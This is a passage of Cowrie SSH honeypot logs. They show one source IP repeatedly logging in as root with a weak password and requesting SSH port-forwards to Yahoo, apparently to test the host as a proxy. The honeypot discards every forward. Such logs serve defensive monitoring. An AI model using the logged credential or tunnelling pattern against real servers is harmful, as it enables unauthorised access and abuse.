-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:50.796716Z","src_ip":"213.209.150.239","session":"de4135e46355"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.080225Z","src_ip":"213.209.150.239","session":"de4135e46355"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":22989,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22989","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.137825Z","session":"de4135e46355"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.194749Z","src_ip":"213.209.150.239","session":"de4135e46355"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":24555,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24555","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.351144Z","session":"de4135e46355"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.407984Z","src_ip":"213.209.150.239","session":"de4135e46355"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.465475Z","src_ip":"213.209.150.239","session":"de4135e46355"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49804,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f1a5460a15c","protocol":"ssh","message":"New connection: 213.209.150.239:49804 (1.2.3.4:22) [session: 6f1a5460a15c]","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.511594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.512502Z","src_ip":"213.209.150.239","session":"6f1a5460a15c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.559885Z","src_ip":"213.209.150.239","session":"6f1a5460a15c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.794630Z","src_ip":"213.209.150.239","session":"6f1a5460a15c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":31337,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31337","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.842515Z","session":"6f1a5460a15c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:51.890009Z","src_ip":"213.209.150.239","session":"6f1a5460a15c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":25690,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:25690","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.025817Z","session":"6f1a5460a15c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.073010Z","src_ip":"213.209.150.239","session":"6f1a5460a15c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.121504Z","src_ip":"213.209.150.239","session":"6f1a5460a15c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49859,"dst_ip":"1.2.3.4","dst_port":22,"session":"20a21d02f96f","protocol":"ssh","message":"New connection: 213.209.150.239:49859 (1.2.3.4:22) [session: 20a21d02f96f]","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.176989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.177986Z","src_ip":"213.209.150.239","session":"20a21d02f96f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.234972Z","src_ip":"213.209.150.239","session":"20a21d02f96f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.517518Z","src_ip":"213.209.150.239","session":"20a21d02f96f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":21970,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21970","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.574943Z","session":"20a21d02f96f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.631700Z","src_ip":"213.209.150.239","session":"20a21d02f96f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12196,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12196","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.787104Z","session":"20a21d02f96f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.844600Z","src_ip":"213.209.150.239","session":"20a21d02f96f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.902158Z","src_ip":"213.209.150.239","session":"20a21d02f96f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49919,"dst_ip":"1.2.3.4","dst_port":22,"session":"158f3aed1df8","protocol":"ssh","message":"New connection: 213.209.150.239:49919 (1.2.3.4:22) [session: 158f3aed1df8]","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.948369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.949601Z","src_ip":"213.209.150.239","session":"158f3aed1df8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:52.996939Z","src_ip":"213.209.150.239","session":"158f3aed1df8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.232568Z","src_ip":"213.209.150.239","session":"158f3aed1df8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":8684,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8684","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.281433Z","session":"158f3aed1df8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.328713Z","src_ip":"213.209.150.239","session":"158f3aed1df8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3056,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3056","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.465654Z","session":"158f3aed1df8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.513126Z","src_ip":"213.209.150.239","session":"158f3aed1df8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.561786Z","src_ip":"213.209.150.239","session":"158f3aed1df8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49967,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9e673428f17","protocol":"ssh","message":"New connection: 213.209.150.239:49967 (1.2.3.4:22) [session: f9e673428f17]","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.608490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.609344Z","src_ip":"213.209.150.239","session":"f9e673428f17"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.656603Z","src_ip":"213.209.150.239","session":"f9e673428f17"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.891974Z","src_ip":"213.209.150.239","session":"f9e673428f17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":2090,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:2090","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.940383Z","session":"f9e673428f17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:53.987726Z","src_ip":"213.209.150.239","session":"f9e673428f17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":28021,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28021","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.126131Z","session":"f9e673428f17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.173823Z","src_ip":"213.209.150.239","session":"f9e673428f17"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.221889Z","src_ip":"213.209.150.239","session":"f9e673428f17"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50025,"dst_ip":"1.2.3.4","dst_port":22,"session":"523eb476e5f0","protocol":"ssh","message":"New connection: 213.209.150.239:50025 (1.2.3.4:22) [session: 523eb476e5f0]","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.267966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.268952Z","src_ip":"213.209.150.239","session":"523eb476e5f0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.316184Z","src_ip":"213.209.150.239","session":"523eb476e5f0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.551280Z","src_ip":"213.209.150.239","session":"523eb476e5f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":5799,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:5799","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.599450Z","session":"523eb476e5f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:54.646619Z","src_ip":"213.209.150.239","session":"523eb476e5f0"}
